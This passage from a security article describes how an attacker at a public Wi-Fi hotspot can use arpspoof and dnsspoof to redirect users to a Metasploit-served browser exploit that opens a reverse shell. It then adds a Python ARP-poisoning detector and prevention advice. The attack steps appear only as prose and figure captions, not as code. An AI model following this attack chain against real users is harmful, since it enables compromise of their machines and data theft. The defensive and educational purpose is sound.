Given the knowledge of the aforementioned exploits, a creative combination could be had. What if the walled garden/login page in the previous exploit actually contained code that would exploit a user’s machine? That way an attacker could gain access to an end-user system just by that user attempting to connect to what they believe is a valid Wi-Fi hotspot. An exploit that could take advantage of this is Microsoft’s relatively recent Create Text Range vulnerability. All a hacker would need to do is copy the malicious code into the login page, and every person who connected to that hotspot could potentially be exploited.

Part of the actual code that could be inserted into a webpage to automatically download and run a malicious executable on the victim’s machine just by that user viewing the webpage.

That would be "cool," but we’re going to take it a step further. What if people who were currently connected to the hotspot were "forced" to view a malicious page, regardless of the URL they entered into their browser? That would be "cooler!"
This hack contains the following steps:
  • Creating a malicious webpage and serving it up on a laptop
  • Redirecting traffic at a Public Wi-Fi Hotspot to that malicious webpage running on the laptop
  • As the victim is redirected and the malicious page is viewed, a browser-based exploit is run which gives the hacker a live command shell (c:\) on the victim’s machine
So, the hacker goes to a Public Wi-Fi hotspot and connects to the network. He then launches Metasploit to create the malicious webpage and serve it up.

Commands to use Microsoft’s Create Text Range vulnerability and to select the option of creating a reverse shell back to the hacker once the exploit is executed
The setting of various options for the exploit
With all options set properly, the web page is served up and ready to exploit the machine by running the "exploit" command
Now that there’s a machine on the hotspot network running a malicious webpage, it’s necessary to redirect traffic destined for the Internet to that website.
Run the arpspoof command to redirect traffic destined for the Internet to the malicious webpage.
Running dnsspoof, you can see that a user attempted to go to foxnews.com but was redirected to the malicious webpage.
This is the page that contains the malicious content that will enable a hacker to connect to the victim machine via Netcat. This page appears regardless of the URL entered by the end-user. This page could look like and say anything.
The hacker then launches Netcat. The C:\ is on the victim’s machine, which is real bad news for the victim. FYI: Windows XP Firewall and Symantec AV were running the entire time.
If you didn’t want to go to a public Wi-Fi hotspot and serve up the webpage, you could just host the website somewhere and send out e-mails trying to convince people to go to the site. With Metasploit, for example, the payload doesn’t have to be a reverse shell; you can have the malicious webpage download and execute a malicious file. Perhaps that malicious file would install a Trojan, Keylogger, or other Malware.
Examples of possible Metasploit Payloads for the ie_createtextrange exploit.
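Before moving on to prevention, one observation a defender can act on: the arpspoof step in the walkthrough only works because the victim's machine silently accepts a new MAC address for the gateway. That leaves a trace in the victim's own ARP table. The code below is an added example of mine, not from the article or from any of the tools it names, that compares successive `arp -a` snapshots and reports the classic poisoning signs: the gateway's MAC changing, one IP seen with more than one MAC, and the gateway's MAC also answering for other hosts. The snapshots, addresses and MACs are constructed for the example.

```python
import re
from collections import defaultdict

# Matches one entry of `arp -a` output in both the Linux form
#   ? (10.0.0.1) at 00:11:22:33:44:55 [ether] on wlan0
# and the Windows form
#   10.0.0.1              00-11-22-33-44-55     dynamic
_ENTRY_RE = re.compile(
    r"(\d{1,3}(?:\.\d{1,3}){3}).*?([0-9A-Fa-f]{2}(?:[:-][0-9A-Fa-f]{2}){5})")


def parse_arp_table(text: str) -> dict:
    """Return {ip: mac} with MACs normalised to lowercase, colon-separated form."""
    table = {}
    for line in text.splitlines():
        m = _ENTRY_RE.search(line)
        if m:
            table[m.group(1)] = m.group(2).lower().replace("-", ":")
    return table


def arp_indicators(snapshots: list, gateway_ip: str) -> dict:
    """Compare successive ARP tables (oldest first) and report poisoning signs."""
    gateway_history = []          # distinct MACs the gateway IP has been mapped to, in order
    macs_per_ip = defaultdict(set)
    gateway_mac_shared = []       # (snapshot index, gateway MAC, other IPs using that MAC)
    for idx, snap in enumerate(snapshots):
        table = parse_arp_table(snap)
        for ip, mac in table.items():
            macs_per_ip[ip].add(mac)
        gw_mac = table.get(gateway_ip)
        if gw_mac and (not gateway_history or gateway_history[-1] != gw_mac):
            gateway_history.append(gw_mac)
        if gw_mac:
            others = sorted(ip for ip, mac in table.items()
                            if mac == gw_mac and ip != gateway_ip)
            if others:
                gateway_mac_shared.append((idx, gw_mac, others))
    return {
        "gateway_mac_history": gateway_history,
        "ips_with_multiple_macs": {ip: sorted(m) for ip, m in macs_per_ip.items() if len(m) > 1},
        "gateway_mac_shared_with": gateway_mac_shared,
    }


def is_suspicious(report: dict) -> bool:
    return (len(report["gateway_mac_history"]) > 1
            or bool(report["ips_with_multiple_macs"])
            or bool(report["gateway_mac_shared_with"]))


# Constructed snapshots: before and after the gateway entry is overwritten by a
# host (10.0.0.23) that now answers ARP for the gateway address.
SNAPSHOT_BEFORE = """\
? (10.0.0.1) at 00:11:22:33:44:55 [ether] on wlan0
? (10.0.0.23) at aa:bb:cc:dd:ee:01 [ether] on wlan0
"""
SNAPSHOT_AFTER = """\
? (10.0.0.1) at aa:bb:cc:dd:ee:01 [ether] on wlan0
? (10.0.0.23) at aa:bb:cc:dd:ee:01 [ether] on wlan0
"""
# Constructed Windows-format snapshot, to show the parser handles both layouts.
WINDOWS_SNAPSHOT = """\
Interface: 10.0.0.42 --- 0xb
  Internet Address      Physical Address      Type
  10.0.0.1              AA-BB-CC-DD-EE-01     dynamic
"""

if __name__ == "__main__":
    report = arp_indicators([SNAPSHOT_BEFORE, SNAPSHOT_AFTER], "10.0.0.1")
    for key, value in report.items():
        print(f"{key}: {value}")
    print("suspicious:", is_suspicious(report))
```

On a hotspot the honest answer to "which MAC is the gateway?" is usually unknown, so the useful signal is change over time and one MAC answering for several addresses; a static ARP entry for the gateway, where the client OS allows it, turns the observation into a block. DNS redirection of the kind dnsspoof performs shows up differently: the name resolves to a private address on the local subnet, which a resolver check can flag with the same before/after approach.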

Now that we've seen the "cool" and illegal hacks, let's talk about the real purpose of this article - Prevention!

Preventing the Hacks: There are basically two things to combating the previous hacks:

  • Taking measures to ensure a hotspot is valid
  • Protecting the machine against browser-based exploits
Ensuring a Hotspot is Valid:
Validating a hotspot is extremely difficult for an end-user to do. In fact, the only realistic method to do so is to use a wireless client designed to work with various hotspots that can use some sort of WISPr check to help ensure the hotspot is what it says it is. I used T-Mobile in the above example in large part because they are one of the few providers that can utilize this type of functionality. In fact, the best solution I know for enterprises to protect against public hotspot AP Phishing for their mobile users is to use a client such as Fiberlink’s e360. Using a client such as this provides two areas of protection:
  1. The hotspot signal itself can be validated
  2. The end-user doesn’t enter their credentials into a webpage which can be faked. They select a signal with the client and enter the credentials in that client.
Note that in the below graphic, a valid T-Mobile HotSpot is displayed as "Fiberlink Wireless Premium Powered by T-Mobile" as opposed to just "tmobile." That is because the client has determined that the particular hotspot in question is, in fact, a valid T-Mobile HotSpot. If it were not a valid hotspot, the SSID would simply be displayed as it is being broadcast.
Client-based solution that helps mitigate risk by helping to validate a hotspot.
As mentioned in the second point, the user enters their credentials into the client, not into a web-based form. For many obvious reasons, this is significantly more secure. With this particular client, both the username and password are immediately encrypted with 256-bit AES.
The entering of credentials into a client as opposed to an easily spoofed webpage.
Protecting the Machine Against Browser-based Exploits:
As with many exploits, the key is to have the mobile device protected at all times. To protect against these exploits, the mobile device needs to:
  • Have the latest security patches installed. This is increasingly difficult to do for corporations, as laptops are spending less and less of their time connected to the corporate LAN. This is bad, since many corporations can only push patches to machines when they are on the LAN. Consequently, corporations need to employ solutions that can push patches down to mobile devices any time they are connected to the Internet and without end-user interaction.
  • Be restricted from surfing the Internet or connecting wirelessly if it does not have the latest patches. This makes sense. If you are not secure enough to surf the Internet or connect to wireless hotspots, because you do not have a necessary patch, you shouldn’t be able to do so. In essence, you need to protect yourself from yourself. Corporations are beginning to look at functionality such as Cisco NAC to help with this. Unfortunately, Cisco NAC only quarantines on the LAN or post-VPN. It won’t analyze the security posture of the mobile device or quarantine it if it doesn’t have the necessary patches until it is essentially too late. That’s why corporations need to implement solutions that will quarantine and remediate devices while the device is mobile, not just when they are VPNing into the corporate network. The logic for assessing the security posture and for quarantining needs to be on the endpoint itself!
  • Employ a program to protect against zero-day type attacks, such as a Personal Firewall with IPS capabilities. As an example, even if the above machine weren’t patched, ISS’ Proventia would protect a machine against the aforementioned browser exploit.

Conclusion:
I hope you’ve seen how easy it is to trick and exploit users when they are in a wireless environment. I also hope that in seeing how these exploits actually take place and seeing how to help prevent them, you and your corporation are better protected.
Special thanks to the Metasploit Project and Schmoo Group. The use of your tools in explaining how the exploits are performed and the work you have put into the development of these tools is invaluable and appreciated.